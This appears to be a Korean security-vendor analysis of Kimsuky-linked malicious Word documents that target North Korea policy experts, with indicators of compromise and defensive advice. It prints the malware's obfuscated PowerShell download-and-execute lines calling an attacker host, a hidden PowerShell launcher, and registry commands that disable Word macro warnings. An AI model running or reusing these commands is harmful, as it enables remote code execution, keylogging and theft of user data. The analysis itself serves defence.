ASEC 분석팀은 안보 및 대북 관련 특정인을 타겟으로 하는 악성 워드 문서가 지속적으로 유포되고 있음을 확인하였다. 유포가 확인된 워드 문서의 파일명에는 대북 관련 인물의 이름이 포함된 경우가 다수 존재하여 해당 분야를 타겟으로 공격이 이루어지는 것으로 추정된다. 최근 확인된 워드 문서의 파일명은 다음과 같다.
| 날짜 | 파일명 |
|---|---|
| 7/18 | (작성양식)2022년 광복절 경축사 전문가 사전 의견수렴.doc |
| 7/20 | 0511_통일부 *** 부장 회의록.doc |
| 8/1 | Asan Symposium 2022.doc |
| 8/3 | 질문지(현** 연구위원님).doc |
| 8/4 | 질문지(안** 총장님).doc |
| 8/11 | (기획)세션6. 경기도 “평화와 통일을 위한 사회적 대화” 추진방안.doc |
| 8/16 | 질문지(정** 박사님).doc |
| 8/17 | 한반도 안보와 대북전략 토론(김**).doc |
워드 문서에는 악성 VBA 매크로가 포함되어 있으며 해당 유형은 안랩 TIP에 공개된 <2021년 Kimsuky 공격 워드(word) 문서 사례 총 정리 분석 보고서> 에서 확인된 B 유형과 동일하다. 전체적인 동작 방식은 다음 그림과 같다.
가장 최근에 확인된 ‘한반도 안보와 대북전략 토론(김**).doc’ 에서 확인된 매크로 코드는 다음과 같다.
이전 ‘워드문서를 이용한 특정인 대상 APT 공격시도‘ 게시글에서 확인된 매크로 코드보다 조금 더 난독화되어 있다. 매크로 실행 시 파워쉘을 통해 ‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’ 에서 추가 스크립트를 다운로드한다.
| [string]$f={(Nwraew-Objwraect Newrat.WebwraCliwraewrant).Doweilsdjfeng(‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’)};$j=$f.Replace(‘wra’,”);$u=$j.Replace(‘eilsdjfe’,’nloadstri’);$x=iex $u;iex $x |
해당 스크립트는 다음 명령어를 통해 사용자 PC 정보를 수집하여 %APPDATA%\Ahnalb\Ahnlab.hwp에 저장하며 해당 파일의 내용을 인코딩하여 hxxp://vjdif.mypressonline[.]com/ho/post.php에 전송한다.
| 실행 명령어 | 수집 정보 |
|---|---|
| GetFolderPath(“Recent”) | 최근 폴더 경로 |
| dir $env:ProgramFiles | ProgramFiles 폴더 내용 |
| dir “C:\Program Files (x86) | C:\Program Files (x86) 폴더 내용 |
| systeminfo | 시스템 정보 |
| tasklist | 실행중인 프로세스 목록 |
이때 HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 에 AhnlabUpdate명의 레지스트리가 존재하면 정보 수집은 수행하지 않고 바로 로그 파일을 전송한다. 이는 이후 키로깅 시에도 동일한 로그 파일명(Ahnlab.hwp)을 사용하기 때문에 해당 키로깅 데이터를 수집하기 위함으로 보인다.
데이터 전송 이후에는 hxxp://vjdif.mypressonline.com/ho/ng.down 에 접속하여 인코딩된 추가 스크립트를 다운로드 및 실행한다.
추가로 다운로드한 ng.down 파일은 인코딩되어 있으며 Start-Job 명령어를 통해 PowerShell 백그라운드 작업으로 실행된다. 해당 스크립트의 기능은 다음과 같다.
- 바로가기 생성
파워쉘 명령어가 저장된 C:\windows\temp 폴더에 HncSerial.log 파일을 생성한다. 또한 악성 코드가 지속적으로 동작할 수 있도록 해당 파일에 대해 Startup 폴더에 바로가기를 생성한다.
| [string]$a = {(New-Object Net.WebClient).Dokarysuntring(‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’)};$b=$a.replace(‘karysun’,’wnloadS’);$c=iex $b;iex $c |
바로가기를 통해 실행되는 파워쉘 명령어는 다음과 같다.
| powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText(‘C:\windows\temp\HncSerial.log’);iex $x} |
- 오피스 보안 설정 변경
레지스트리 값 변경을 통해 매크로가 항상 실행 될 수 있도록 오피스 보안설정을 수정한다.
| New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\14.0\Word\Security -Name VBAWarnings -Value 1 New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\15.0\Word\Security -Name VBAWarnings -Value 1 New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\16.0\Word\Security -Name VBAWarnings -Value 1 New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\17.0\Word\Security -Name VBAWarnings -Value 1 New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\18.0\Word\Security -Name VBAWarnings -Value 1 New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\19.0\Word\Security -Name VBAWarnings -Value 1 |
- 키로깅
사용자의 키 입력을 %APPDATA%\Ahnalb\Ahnlab.hwp 에 기록한다. 기록된 내용은 사용자가 PC 시작 시 앞서 생성한 바로가기 파일이 실행되어 hxxp://vjdif.mypressonline[.]com/ho/ng.txt 에 접속하여 해당 페이지에 존재하는 파워쉘 명령어가 실행되어 hxxp://vjdif.mypressonline[.]com/ho/post.php에 전송한다.
대북 관련 인사를 대상으로 하는 워드 문서는 과거부터 꾸준히 확인되고 있어 각별한 주의가 필요하다. 발신자를 알 수 없는 메일의 첨부파일이나 출처를 알 수 없는 파일의 실행을 자제해야 한다. 또한, 워드 문서에 포함된 악성 매크로가 자동으로 실행되지 않도록 적절한 보안 설정을 유지해야한다.
[파일 진단]
Downloader/DOC.Kimsuky
Trojan/PowerShell.FileUpload
[IOC]
6f9c20f8f7f28a732b0853929a06b79c (VBA)
hxxp://vjdif.mypressonline[.]com/ho/ng.txt
hxxp://vjdif.mypressonline[.]com/ho/ng.down
hxxp://vjdif.mypressonline[.]com/ho/post.php
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보
[…] 분석팀은 ‘대북 관련 특정인을 타겟으로 하는 악성 워드 문서’에서 확인된 워드 문서 유형이 최근 FTP를 이용하여 사용자 정보를 […]